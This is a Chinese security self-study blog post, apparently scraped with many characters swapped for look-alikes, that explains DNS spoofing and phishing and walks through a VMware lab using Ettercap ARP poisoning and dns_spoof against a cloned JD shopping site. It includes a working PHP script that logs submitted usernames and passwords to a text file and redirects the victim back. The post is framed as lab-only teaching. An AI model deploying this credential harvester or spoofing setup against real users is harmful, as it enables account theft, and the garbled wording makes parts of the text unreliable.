[网络安全自学篇] 四十二.DNS欺骗和钓鱼网站原理详解及漏洞还原

这是做者的网络安全自学教程系列,主要是关于安全工具和实践操做的在线笔记,特分享出来与博友们学习,但愿您们喜欢,一块儿进步。前文分享了中间人攻击或ARP欺骗攻击,从ARP原理到局域网配置进行描述。这篇文章将详细讲解DNS欺骗(DNS投毒)及钓鱼网站原理知识,并经过Ettercap工具复现某购物网站的钓鱼漏洞,本文的重点是让您对ARP欺骗、DNS欺骗和钓鱼攻击有必定认识。真心但愿这篇基础文章对您有所帮助,也欢迎你们讨论。javascript

做者做为网络安全的小白,分享一些自学基础教程给你们,主要是关于安全工具和实践操做的在线笔记,但愿您们喜欢。同时,更但愿您能与我一块儿操做和进步,后续将深刻学习网络安全和系统安全知识并分享相关实验。总之,但愿该系列文章对博友有所帮助,写文不易,大神们不喜勿喷,谢谢!若是文章对您有帮助,将是我创做的最大动力,点赞、评论、私聊都可,一块儿加油喔~php

PS:本文参考了B站(千峰教育峰老师)、安全网站和参考文献中的文章,并结合本身的经验和实践进行撰写,也推荐你们阅读参考文献。html

下载地址:https://github.com/eastmountyxz/NetworkSecuritySelf-studyjava

前文学习:
[网络安全自学篇] 一.入门笔记之看雪Web安全学习及异或解密示例
[网络安全自学篇] 二.Chrome浏览器保留密码功能渗透解析及登陆加密入门笔记
[网络安全自学篇] 三.Burp Suite工具安装配置、Proxy基础用法及暴库示例
[网络安全自学篇] 四.实验吧CTF实战之WEB渗透和隐写术解密
[网络安全自学篇] 五.IDA Pro反汇编工具初识及逆向工程解密实战
[网络安全自学篇] 六.OllyDbg动态分析工具基础用法及Crakeme逆向
[网络安全自学篇] 七.快手视频下载之Chrome浏览器Network分析及Python爬虫探讨
[网络安全自学篇] 八.Web漏洞及端口扫描之Nmap、ThreatScan和DirBuster工具
[网络安全自学篇] 九.社会工程学之基础概念、IP获取、IP物理定位、文件属性
[网络安全自学篇] 十.论文之基于机器学习算法的主机恶意代码
[网络安全自学篇] 十一.虚拟机VMware+Kali安装入门及Sqlmap基本用法
[网络安全自学篇] 十二.Wireshark安装入门及抓取网站用户名密码(一)
[网络安全自学篇] 十三.Wireshark抓包原理(ARP劫持、MAC泛洪)及数据流追踪和图像抓取(二)
[网络安全自学篇] 十四.Python攻防之基础常识、正则表达式、Web编程和套接字通讯(一)
[网络安全自学篇] 十五.Python攻防之多线程、C段扫描和数据库编程(二)
[网络安全自学篇] 十六.Python攻防之弱口令、自定义字典生成及网站暴库防御
[网络安全自学篇] 十七.Python攻防之构建Web目录扫描器及ip代理池(四)
[网络安全自学篇] 十八.XSS跨站脚本攻击原理及代码攻防演示(一)
[网络安全自学篇] 十九.Powershell基础入门及常见用法(一)
[网络安全自学篇] 二十.Powershell基础入门及常见用法(二)
[网络安全自学篇] 二十一.GeekPwn极客大赛之安全攻防技术总结及ShowTime
[网络安全自学篇] 二十二.Web渗透之网站信息、域名信息、端口信息、敏感信息及指纹信息收集
[网络安全自学篇] 二十三.基于机器学习的恶意请求识别及安全领域中的机器学习
[网络安全自学篇] 二十四.基于机器学习的恶意代码识别及人工智能中的恶意代码检测
[网络安全自学篇] 二十五.Web安全学习路线及木马、病毒和防护初探
[网络安全自学篇] 二十六.Shodan搜索引擎详解及Python命令行调用
[网络安全自学篇] 二十七.Sqlmap基础用法、CTF实战及请求参数设置(一)
[网络安全自学篇] 二十八.文件上传漏洞和Caidao入门及防护原理(一)
[网络安全自学篇] 二十九.文件上传漏洞和IIS6.0解析漏洞及防护原理(二)
[网络安全自学篇] 三十.文件上传漏洞、编辑器漏洞和IIS高版本漏洞及防护(三)
[网络安全自学篇] 三十一.文件上传漏洞之Upload-labs靶场及CTF题目01-10(四)
[网络安全自学篇] 三十二.文件上传漏洞之Upload-labs靶场及CTF题目11-20(五)
[网络安全自学篇] 三十三.文件上传漏洞之绕狗一句话原理和绕过安全狗(六)
[网络安全自学篇] 三十四.Windows系统漏洞之5次Shift漏洞启动计算机
[网络安全自学篇] 三十五.恶意代码攻击溯源及恶意样本分析
[网络安全自学篇] 三十六.WinRAR漏洞复现(CVE-2018-20250)及恶意软件自启动劫持
[网络安全自学篇] 三十七.Web渗透提升班之hack the box在线靶场注册及入门知识
[网络安全自学篇] 三十八.hack the box渗透之BurpSuite和Hydra密码爆破及Python加密Post请求(二)
[网络安全自学篇] 三十九.hack the box渗透之DirBuster扫描路径及Sqlmap高级注入用法(三)
[网络安全自学篇] 四十.phpMyAdmin 4.8.1后台文件包含漏洞复现及详解(CVE-2018-12613)
[网络安全自学篇] 四十一.中间人攻击和ARP欺骗原理详解及漏洞还原git

前文欣赏:
[渗透&攻防] 一.从数据库原理学习网络攻防及防止SQL注入
[渗透&攻防] 二.SQL MAP工具从零解读数据库及基础用法
[渗透&攻防] 三.数据库之差别备份及Caidao利器
[渗透&攻防] 四.详解MySQL数据库攻防及Fiddler神器分析数据包github

声明:本人坚定反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络须要咱们共同维护,更推荐你们了解它们背后的原理,更好地进行防御。web


一.DNS欺骗和ARP攻击机钓鱼网站制做

1.基础知识

DNS欺骗:
DNS欺骗就是攻击者冒充域名服务器的一种欺骗行为。 若是能够冒充域名服务器,而后把查询的IP地址设为攻击者的IP地址,这样的话,用户上网就只能看到攻击者的主页,而不是用户想要取得的网站的主页了,这就是DNS欺骗的基本原理。DNS欺骗其实并非真的“黑掉”了对方的网站,而是冒名顶替、招摇撞骗罢了。面试

在这里插入图片描述


网站钓鱼:
钓鱼者运用社会工程学(Social Engineering)知识诱骗受害者,以在未受权状况下获取对方的姓名、年龄、邮箱帐号,甚至是银行卡密码等私人信息。钓鱼每每和社会工程学相结合进行诱导,而社会工程学是黑客的内功,可否灵活运用能够体现一个黑客的我的修为,因此说“防人之心不可无”这句话并不是没有道理,凡事不要害人可是总要留个心眼,不然最终受伤的就是本身。正则表达式

社会工程学黑客经常使用伎俩:(推荐做者前文:九.社会工程学之基础概念、IP获取、物理定位等算法

  • 电话号码欺骗
  • 利用坏消息做案
  • 垃圾邮件诱骗
  • 滥用网民对社交网络的信任
  • 二维码引诱
  • 恶意APP劫持

那么,如何防护社工呢?别占小便宜,没有充分信任状况下别去点击任何连接或下载任何APP。本文的案例将利用虚假的某购物网站,使用DNS与ARP欺骗手段使用户输入真是的用户名和密码。该方法还能截获HTTPS加密信息。

PS:做者原本想分享一个亲身经历的社会工程学案例,黑客朋友是如何一步步定位个人信息,但这篇文章太长,有时间再分享吧!

在这里插入图片描述



2.实验基础

实验目标:
使用Kali系统模拟攻击者,利用中间人的攻击手段来对受害者进行DNS欺骗,使受害者经过访问假的某购物网站,来获取用户登陆的用户名与密码。经过三种攻击来窃取登陆的用户名和密码:

  • 中间人攻击
  • DNS欺骗
  • 钓鱼网站

为何不直接使用中间人攻击获取用户的帐户与密码呢?由于若是信息加密,中间人攻击(推荐前文)就不能截获了。可是若是访问假的钓鱼网站,就能获取信息。

在这里插入图片描述

注意:本文的实验绝对禁止在真实环境中去完成,做者将引用B站视频中虚拟机实验复现,未经受权的测试或攻击行为咱们一概禁止。

咱们这篇文章的目的是为了学会防护,同时多一种安全手段,在受权状况下能够进行钓鱼网站攻击测试。这种方法适合各大网站、银行、购物、邮箱等。


实验环境:
此次实验会开三台虚拟机,一台XP系统、一台2003系统、一台Kali攻击机。

  • 虚拟机软件:VMware V12.0版本
  • 三台虚拟机:Windows XP(模拟客户机)、Windows Server 2003(模拟WEB及FTP服务器)、Kali(模拟攻击机)
  • 假的某购物网站素材
  • 工具:Ettercap软件

基本流程:
构建的拓扑图以下所示,首先开3台虚拟机,而后有1台交换机,这3台虚拟机都链接在这台交换机上,共同构成一个虚拟的局域网,来进行这个实验。实验基本流程以下:(配置过程参考前文)

  • 第一步是构建整个局域网,而且配置好IP地址且能相互通信(ping通)。
  • 第二步是将Windows 2003系统做为服务器(现实中也能够将该系统设置为服务器),接着将Windows XP系统设置为客户机,它须要去登陆某购物网站。
  • 第三步是搭建Kali攻击机,以前是客户机和服务器直接通信,如今是客户机发送的信息流经Kali机,再传至服务器。因为通过中间人,Kali机就能够监听客户机和服务器的通信内容,甚至篡改数据。

在这里插入图片描述



3.实验原理

接着做者分享DNS域名解析和DNS欺骗原理知识。

域名解析:
假设左侧电脑是某公司的电脑,好比企业员工电脑(受害者);右侧这个是互联网,好比某购物官方网站(Web服务器),假设IP地址为2.2.2.2,并按照上节课讲述的内容搭建一个网站,经过IIS或Apache搭建。

在这里插入图片描述

域名解析(Domain Name Resolution)
域名解析是把域名指向网站空间IP,让人们经过注册的域名能够方便地访问到网站的一种服务。IP地址是网络上标识站点的数字地址,为了方便记忆,采用域名来代替IP地址标识站点地址。域名解析就是域名到IP地址的转换过程。域名的解析工做由DNS服务器完成。


员工经过 http://2.2.2.2 就能访问,可是这个地址很差记,咱们平时都是输入“www”上网。因此须要作域名解析,把这个域名地址解析成IP地址再访问,这里好比绑定域名 http://www.gw.com。当浏览器中访问“http://www.gw.com”后,首先咱们访问本地缓存或本地HOST文件(第一次访问会存储至本地缓存),若是本地都没有,则会寻找公网上的DNS服务器,它里面会有一个解析文件gw.com,以下图所示。

问一个问题:这是正向解析仍是反向解析呢?
答案是正向解析的过程,即已知域名解析IP地址。那么,DNS又是怎么知道这个记录的呢?怎么知道“www.gw.com”就是“2.2.2.2”呢?这是该购物网站花钱购买域名(gw.com),购买以后服务器上会为你建立解析文件,而后该购物网站的相关人员会绑定IP地址并将该记录添加至DNS服务器上。此时,全世界都能访问这个域名并解析。

在这里插入图片描述

万网能够购买域名地址,好比做者的域名“www.eastmountyxz.com”。

在这里插入图片描述


正常访问过程:
当企业员工电脑访问该购物网站时,会去DNS服务器进行解析;而后找到地址2.2.2.2,并返回给企业员工电脑;最后访问该购物Web服务器,假设是IIS,它会将购物网站的首页返回给你的浏览器。

在这里插入图片描述

恶意访问过程:
假设如今出现了一个坏蛋,地址是3.3.3.3。首先它用了ARP攻击(中间人攻击),能截获数据。那么如今企业员工向服务器(4.4.4.4)发送请求,要通过坏蛋,坏蛋一看是向4.4.4.4发送请求,是一个DNS服务器,并且要解析gw.com域名,它不进行修改和中断。接着,DNS回应会发送2.2.2.2地址,这个过程当中坏蛋只是开启了中间人攻击,监听数据并无进行任何操做。

在这里插入图片描述

接着坏蛋想:我能不能把本身也假装成DNS服务器,而且提供错误的DNS解析记录呢?
他把该购物网站域名(www.gw.com)解析成3.3.3.3地址。注意,当企业员工发送的信息再通过坏蛋时,明明是给4.4.4.4发送请求,但坏蛋会把本身假装成DNS服务器,说“我才是那台DNS服务器”,而且它能控制这个信息终止与真实的DNS服务器通信,说“我才是4.4.4.4,我经过解析找到记录了,它是3.3.3.3”。此时,员工被骗了,这种方式称为——DNS投毒

在这里插入图片描述

为何叫DNS投毒呢?
员工访问成功以后,会把这个域名(gw.com)和IP地址存到缓存中,因此它的缓存会记录一条信息,gw.com对应3.3.3.3。DNS缓存投毒也是很是使人头疼的一个攻击。由于它也作验证,后面将会分享具体实验,但它的验证很是差,因此致使除了上节课讲述得ARP投毒外,DNS投毒、DNS欺骗、DNS污染也是很是头疼的问题。

在这里插入图片描述

此时,成功诱骗了企业员工电脑。IE浏览器访问“www.gw.com”是向坏蛋发送请求,和真实的购物网站Web服务器、DNS服务器就没有关系了。换句话说,后续的请求就是企业员工和坏蛋他们两个。


钓鱼网站搭建:
接着咱们开Apache,而后发布一个假的gw网站。注意,这篇文章对某购物网站没有任何恶意,咱们主要是作一个科普,提升博友们网络安全的意识和防护措施。

钓鱼网站和真实网站尽可能相近,而咱们实验仅作简单的测试,有登陆页面便可。接着,当受害者输入真实用户名和密码,点击提交以后,咱们会链接后台数据库收集相关信息便可。表单form中action会指向php,获取用户名和密码,并写入数据库或TXT文件。咱们称这个网站为——钓鱼网站。

在这里插入图片描述

注意:银行门户网站尤为须要注意该防范。同时,通常提交后数据保存,而后网页跳转到真正的购物网站,用户会觉得密码输入错误,从新输入。信息也被收集,并且不易觉察。


二.DNS投毒实验环境搭建

接着开始作这个实验,左边是受害人,中间是坏蛋,右边是模拟某购物官方网站和DNS服务器。在现实中,真实网站和钓鱼网站一般会很像。

在这里插入图片描述

首先,咱们开三台虚拟机。先还原快照,而后直接开启虚拟机。

实验流程:

  • 开启虚拟机并配置IP
  • 在Win2003中搭建JD购物网站Web服务器及DNS服务器
  • 客户机尝试访问真正的购物网站
  • 开启ARP欺骗和DNS欺骗
  • 网站钓鱼

第一步,经过VMware设置虚拟网络。
开启三台虚拟机(XP、200三、Kali),VMware软件在安装时会在电脑上内嵌一个虚拟交换机,理解为虚拟网络。选择虚拟机,点击右键,而后点击“设置”。这里做者使用“还原快照”,读者能够尝试本身配置环境。

在这里插入图片描述



第二步,配置虚拟机IP地址并可以ping通。
将三台虚拟机(XP、win200三、Kali)桥接到同一个虚拟网络中去。右键设置,点击“网络适配器”,选择“VMnet2”,三台虚拟机都桥接到该虚拟网络“VMnet2”中,这样三台虚拟机就成功连成了同一个局域网。

在这里插入图片描述

配置XP系统(员工电脑)的IP地址须要选中“网上邻居”,再右键“属性”,点击“本地链接”右键“属性”。

在这里插入图片描述

设置IP地址以下“10.1.1.1”,子网掩码设置为“255.255.255.0”。

在这里插入图片描述

接着登陆Windows 2003服务器。

在这里插入图片描述

登陆Kali系统。

在这里插入图片描述

在Kali系统中输入命令配置IP地址,eth表示网卡名称。
ifconfig eth0 10.1.1.2/24

在这里插入图片描述

而后尝试查看是否IP地址创建成功。Linux默认一直ping,以下图所示小杨是链接成功的。
ping 10.1.1.1

在这里插入图片描述

接着尝试链接小娜的电脑。
ping 10.1.1.3

在这里插入图片描述

到此,咱们成功创建了以下图所示的虚拟局域网。

在这里插入图片描述



第三步,在Win2003中搭建某购物网站Web服务器及DNS服务器。

点击“管理工具”->“DNS”。现实中,不少企业也都是使用该DNS工具软件来部署DNS服务器。通常中大型公司都有本身的DNS服务器。

在这里插入图片描述

点击以后,以下图所示,点开DNS,发现里面有正向查找区域和反向查找区域。

DNS(Domain Name Service) 域名解析服务,就是将域名和 ip 之间作相应的转换。
正向解析:根据域名查找对应的ip地址
反向解析:根据ip地址查找对应的域名

在这里插入图片描述

选择“正向查找区域”,右键点击“新建区域”。该区域是创建DNS解析文件。

在这里插入图片描述

点击下一步,以下图所示。

在这里插入图片描述

区域名称填写“jd.com”。

在这里插入图片描述

点击下一步,直至完成。

在这里插入图片描述

最终建立成功。

在这里插入图片描述

此时存在了“jd.com”区域,它表示之后全球范围内,凡是解析这个域名后缀的权威服务器就是这台“shimisi”服务器。

在这里插入图片描述


什么是权威服务器呢?
假设JD的DNS权威服务器在北京,如今贵阳的DNS怎么办呢?贵阳的公网DNS只有部分域名,贵阳的员工想访问JD,他只能请求当地的服务器,若是没有JD记录,它又会去请求JD的权威服务器,权威服务器会把记录传递给贵阳的服务器并缓存,再发送给员工。当地的其余员工访问时,它会返回本地缓存记录,这称之为非权威应答。

接着咱们调用nslookkup命令,查看结果以下图所示。它是非权威应答,表示真正域名是“www.jd.com”,还有个别名是“www.jdcdn.com”,真正地址为“117.169.11.1”。

若是咱们想要攻击该网站,须要获取JD地址“117.169.11.1”,该地址是“192.168.43.1”解析的。非权威应答表示地址“117.169.11.1”并无记录在“192.168.43.1”服务器上。若是使用nslookup命令发现解析的应答没有显示“非权威应答”这句话,表示是权威应答,但很难看到。

在这里插入图片描述

本地nslookup查看百度以下图所示:

在这里插入图片描述

此时,该实验域名区域配置文件是在这台服务器上写好了,因此它就是权威服务器。接着点击“查看”->“高级”。

在这里插入图片描述

能够看到“缓存的查找”信息以下图所示。若是不是JD服务器,就没有区域配置文件“jd.com”,员工就会寻找真正的JD服务器并存储至缓存。因此说,DNS服务器只要有这个区域配置文件就表明权威。

在这里插入图片描述

接着搭建一个网站,右键“新建主机(A)”,其中A记录表明正向解析记录。

在这里插入图片描述

输入“www”,它会自动补全,而且指向10.1.1.3Web服务器。

在这里插入图片描述

此时显示信息以下图所示,建立了正向解析记录。

在这里插入图片描述


第四步,点击“管理工具”->“IIS”,新建Web服务器。

在这里插入图片描述

显示以下图所示:

在这里插入图片描述

右键停用默认网站,再选中“网站”点击“新建”->“网站”。

在这里插入图片描述

描述随便填写,好比“jd”,再点击“下一步”。

在这里插入图片描述

网站IP地址选择“10.1.1.3”。

在这里插入图片描述

网站路径选择本地JD网站。

在这里插入图片描述

钓鱼网站以下图所示:

在这里插入图片描述

显示以下图所示:

在这里插入图片描述

选择该文件夹并勾选“读取”,由于它是静态网页,因此这里仅选择“读取”权限。

在这里插入图片描述

在这里插入图片描述

那么,这个网站如何保存下来的呢?
一般黑客不会撰写大量的HTML代码,会经过真实网站保存后修改,模拟成钓鱼网站。好比在IE浏览器中点击“文件”->“另存为”便可,它会将CSS、图片、资源等保存至本地。

在这里插入图片描述

在添加jd网站以后,右键“属性”设置主页。

在这里插入图片描述

在“文档”中添加“index.html”主页。

在这里插入图片描述


问题1: 此时经过XP系统访问咱们搭建的服务器,在浏览器中输入“www.jd.com”,为何访问失败呢?

在这里插入图片描述

在CMD中输入nslookup解析查看,显示没法响应。

在这里插入图片描述

缘由是没有指定DNS。如今Windows 2003是DNS服务器,而你输入域名以后为何解析不成功,你根本不知道谁是DNS服务器。打开网络链接,选中“本地链接”,右键“属性”。

在这里插入图片描述

须要将Windows 2003的DNS服务器地址写到XP系统中,再进行访问,这里填写“10.1.1.3”。

在这里插入图片描述

设置成功以后能成功访问。

在这里插入图片描述

在这里插入图片描述

问题2: 此时填写用户名和密码能登陆成功吗?答案是不能。由于咱们只搭建了一个主页面,该表单不能处理。后续会制做一个点击提交后登陆失败,再跳转到真实的京东网站的案例。

在这里插入图片描述

问题3: 怎么判断访问的这个网站是真实的JD网站仍是钓鱼搭建的网站呢?


三.开启ARP欺骗和DNS欺骗

接下来须要在Kali系统作一些操做。

  • 配置IP地址
  • ARP攻击
  • 假装DNS服务器
  • 发布钓鱼网站

这里先作好假装DNS服务器,开启钓鱼网站,最后再设置ARP攻击。当企业员工访问时,就会访问假的网站。

在这里插入图片描述

查看以前搭建的局域网是否可以ping通。
ping 10.1.1.1
ping 10.1.1.3

在这里插入图片描述


第一步,配置假装DNS。
打开一个文件,经过vim命令实现。“etc”目录通常放置配置文件,设置ettercap软件的配置文件。

在这里插入图片描述

打开以下图所示:

在这里插入图片描述

找到下面黑色字体的位置,它表示“解析记录域名+A记录+IP地址”,接着进行修改(连续按两个字母D+D能删除一行)。

在这里插入图片描述

按下“I”键,进入输入模式,添加内容以下所示。其中A表示正向解析,PTR表示反向解析,补充一个反向解析能增长实验的成功性,防止浏览器的反向验证。

在这里插入图片描述

现实中也能够尝试修改为“*”,表示任何域名都会解析为“10.1.1.2”。

在这里插入图片描述

接着输入“:wq”保存退出。此时的解析记录建立成功了,接着后续会在Ettercap软件中开启攻击阀门。


第二步,打开Apache并配置服务。

  • 开启服务
    systemctl start apache
  • 查看服务端口是否开启成功
    netstat -antpl

在这里插入图片描述

此时属于监听状态,端口为80,监听号为1985。

在这里插入图片描述

服务开启了,那么咱们Apache的网站在哪里呢?
Apache默认站点路径在根目录下“/var/www/html”中,其中“var”目录主要存放可变文件,好比日志、缓存、站点,它们常常会被更新。查看以下所示。

在这里插入图片描述

此时里面虽然有网页,但与本文的实验无关。所以咱们须要清除当前目录内容,输入命令“rm - rf *”。

注意:该命令千万别错误写成“rm - rf /* ”,它表示删除根目录下全部东西。而“rm - rf *” 表示删除当前目录,-r表示删除全部子文件或子文件夹,f表示强制。

在这里插入图片描述


第三步,制做假的jd网站并放置Kali系统中。
接下来咱们要放置假的jd网站。新建一个“1.txt”记事本,一个“error.php”网站。如今咱们但愿用户点击提交,把提交表单的内容发送给“error.php”文件,而后把帐号和密码提取出来放在“1.txt”文件中。一样,咱们能够设置数据库进行实时抓取及存储。

在这里插入图片描述

“error.php”代码以下,调用stripslashes()函数获取POST表单元素,赋值为name和pass变量,最后文件操做存储至“1.txt”文件中。HTML代码表示存储内容以后,而后返回原网页。

<?php
	$name = stripslashes($_POST['name']);
	$pass = stripslashes($_POST['pass']);
	$content = "您已捕获JD帐号及密码1个:" . "用户名" . $name . "密码" . $pass;
	$filed = @fopen("1.txt", "a+");
	@fwrite($filed, "$content\n");
?>
<html>
	<head>
		<script type="text/javascript">
			function goBack() {
				window.history.back();   //后退+刷新
			}
		</script>
	</head>
	<body onload="goBack()">
		<!-- 加载以后当即执行一段JavaScript代码 -->
	</body>
</html>

审查元素以下图所示,定位“name”和“pass”元素。

在这里插入图片描述

同时修改“index.html”代码,表单提交给该php文件。

在这里插入图片描述

接着将制做好的假网站放置到Kali系统的桌面。

在这里插入图片描述

拷贝文件及文件夹至“/var/www/html”默认站点目录中。

cp -r /root/Desktop/jd/* ./

在这里插入图片描述

接着须要开启Linux写入权限。经过“ls -l”命令查看权限,以“1.txt”权限为例,第一块“-rwx”表明文件主人root的权限,即管理员权限;第二块“r–”表明这个文件所在组的其余人的权限;第三块“r–”表明其余人的权限,Apache属于其余人权限。“r”表明读取权限、“w”达标写入权限、“x”表明执行权限。

ls -l

在这里插入图片描述

调用命令“chmod 777 1.txt”修改权限,“chmod”表示change mod修改文件属性;“1.txt”表示所修改的文件;“777”表示权限列表,每一个“7”表示一组,总共三组,“r–”二进制表示“100”,其值为4,而“111”二进制值为7(4+2+1),即全部权限都开启。

chmod 777 1.txt

在这里插入图片描述

再好比,咱们尝试使用“chmod 766 1.txt”命令,能够看到修改权限为“-rwxrw-rw-”。

在这里插入图片描述

到此,咱们的网站就搭建好了,接下来开始攻击。


第四步,设置ARP欺骗攻击及Sniff嗅探功能。
Kali中包含了丰富的渗透和安全测试软件供你们使用。

在这里插入图片描述

咱们接下来要使用的软件叫“Ettercap”。

在这里插入图片描述

该软件打开以下图所示,它不只仅能ARP投毒,还能进行各类DNS投毒等。

在这里插入图片描述

点击“Sniff”第一个选项“Unified sniffing”。

在这里插入图片描述

选择网卡接口“eth0”。

在这里插入图片描述

选中网卡以后,开始点击“Host list”,列出全部主机。

在这里插入图片描述

再点击第三个按钮“Scan for hosts”扫描。

在这里插入图片描述

输出结果以下图所示,包括“10.1.1.1”和“10.1.1.3”。本实验只有三台主机,而现实中员工会经过交换机、路由器去链接互联网,真正的JD在互联网上,而攻击者若是要截获你和JD的数据,须要截获员工主机和网关的通讯数据。接下来我要在它们两个之间作中间人,怎么作呢?

在这里插入图片描述

选择第一个,添加目标1“Add to Target 1”;再选择第二个,添加目标2“Add to Target 2”。

在这里插入图片描述

再点击“Mitm”->“ARP poisoning”,而且勾选“Sniff remote connections”,此时就创建了ARP投毒,把10.1.1.1和10.1.1.3欺骗,而且开始数据拦截。

在这里插入图片描述

在这里插入图片描述

此时,中间人攻击或ARP欺骗攻击已经搭建完成,咱们能截获员工(XP系统)和服务器(2003系统)的通讯数据。但本篇文章是介绍如何实现DNS欺骗攻击和钓鱼,因此咱们须要在Kali系统布局诱骗操做,收到员工请求以后再也不转发至2003服务器,而是主动给你一个假的解析,这就称为——DNS投毒。


第五步,设置DNS投毒。
选择“Plugins”->“Manage the plugins”。

在这里插入图片描述

能够看到这个软件很是强大,双击“dns_spoof”激活DNS投毒。

在这里插入图片描述

此时,咱们在XP系统浏览器中访问“www.jd.com”网站,输入用户名和密码点击登陆,但仍然失败,这是为何呢?由于刚刚咱们的Windows XP系统访问过Windows 2003服务器,该记录被存储在缓存中,再访问京东时就再也不询问服务器,因此Kali就没法欺骗。现实中该实验是在没有访问状况下进行,等待缓存消失便可。

在这里插入图片描述

在这里插入图片描述

打开CMD,输入“ipconfig /flushdns”清除DNS缓存。

在这里插入图片描述

再次访问JD网站,而后点击登陆,此时实验成果。若是hacker将其跳转回真实的京东网站,其隐藏性会更好。

在这里插入图片描述

此时Kali系统截获的内容以下图所示:

在这里插入图片描述



四.总结

写到这里,这篇基础性文章就此结束,但愿文章对您有所帮助。真的感受本身技术好菜,要学的知识好多。这是第42篇原创的安全系列文章,从网络安全到系统安全,从木马病毒到后门劫持,从恶意代码到溯源分析,从渗透工具到二进制工具,还有Python安全、顶会论文、黑客比赛和漏洞分享。未知攻焉知防,人生漫漫其路远兮,做为初学者,本身真是爬着前行,感谢不少人的帮助,继续爬着,继续加油。

在这里插入图片描述

侠之为大,为国为民。向一线医护人员、军人、工人、科学家和全部工做者致敬。我们中国人一辈子的最高追求,为天地立心,为生民立命,为往圣继绝学,为万世开太平,他们真的作到了。生活哪有什么岁月静好,只不过这些人替咱们负重前行。但愿每个人都健康平安,戴口罩不出门,勤洗手多吃饭。武汉加油,湖北加油,中国加油。众志成城,加油必胜!!!

在这里插入图片描述

最后但愿你们帮我CSDN博客之星投投票,天天能够投5票喔,谢谢你们!八年,在CSDN分享了410篇文章,65个专栏,400多万人次浏览,包括Python人工智能、数据挖掘、网络爬虫、图象处理、网络安全、JAVA网站、Android开发、LAMP/WAMP、C#网络编程、C++游戏、算法和数据结构、面试总结、人生感悟等。固然还有我和你的故事,感恩一路有你,感谢一路同行,但愿经过编程分享帮助到更多人,也但愿学成以后教更多学生。由于喜欢,因此分享,且看且珍惜,加油!个人学生们,等我学成归来~

投票地址:http://m234140.nofollow.ax.mvote.cn/opage/ed8141a0-ed19-774b-6b0d-39c3aaf89dde.html?from=singlemessage

(By:Eastmount 2020-01-30 深夜2点写于贵阳 http://blog.csdn.net/eastmount/ )


参考文献以下,强烈推荐你们阅读:
[1] 2019 黑客入门基础Windows网络安全精讲 - B站前锋教育feige老师
[2] Linux中搭建DNS服务器 - 谢公子大神